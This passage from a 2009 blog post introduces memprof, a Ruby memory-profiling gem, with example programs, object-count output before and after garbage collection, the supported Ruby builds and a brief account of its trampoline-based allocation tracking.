  @blah[1] << "aaaaa"
}

1000.times {
   @blah[2] << "bbbbb"
}
Memprof.stats
Memprof.stop

This program creates 1100 objects which are not destroyed during the start and stop sections of the file because references are held for each object created.

Let's look at the output from memprof:

   1000 test.rb:11:String
    100 test.rb:7:String

In this example memprof shows the 1100 objects created, broken up by file, line number, and type.

Let's take a look at another example:

require 'memprof'
Memprof.start
require "stringio"
StringIO.new
Memprof.stats

This simple program is measuring the number of objects created when requiring stringio.

Let's take a look at the output:

    108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
     14 test2.rb:3:String
      2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
      1 test2.rb:4:StringIO
      1 test2.rb:4:String
      1 test2.rb:3:Array
      1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable

This output shows an internal Ruby interpreter type __node__ was created (these represent code), as well as a few Strings and other objects. Some of these objects are just garbage objects which haven't had a chance to be recycled yet.

What if we nudge the garbage collector along a little bit just for our example? Let's add the following two lines of code to our previous example:

GC.start
Memprof.stats

We're now nudging the garbage collector and outputting memprof stats information again. This should show fewer objects, as the garbage collector will recycle some of the garbage objects:

    108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
      2 test2.rb:3:String
      2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
      1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable

As you can see above, a few Strings and other objects went away after the garbage collector ran.

Which Rubies and systems are supported?

  • Only unstripped binaries are supported. To determine if your Ruby binary is stripped, simply run: file `which ruby`. If it is, consult your package manager's documentation. Most Linux distributions offer a package with an unstripped Ruby binary.
  • Only x86_64 is supported at this time. Hopefully, I'll have time to add support for i386/i686 in the immediate future.
  • Linux Ruby Enterprise Edition (1.8.6 and 1.8.7) is supported.
  • Linux MRI Ruby 1.8.6 and 1.8.7 built with --disable-shared are supported. Support for --enable-shared binaries is coming soon.
  • Snow Leopard support is experimental at this time.
  • Ruby 1.9 support coming soon.

How does it work?

If you've been reading my blog over the last week or so, you'd have noticed two previous blog posts (here and here) that describe some tricks I came up with for modifying a running binary image in memory.

memprof is a combination of all those tricks and other hacks to allow memory profiling in Ruby without the need for custom patches to the Ruby VM. You simply require the gem and off you go.

memprof works by inserting trampolines on object allocation and deallocation routines. It gathers metadata about the objects and outputs this information when the stats method is called.

What else is planned?

Jake Douglas, Aman Gupta, and I have lots of interesting ideas for new features. We don't want to ruin the surprise, but stay tuned. More cool stuff coming really soon :)


Written by Joe Damato

December 11th, 2009 at 5:59 am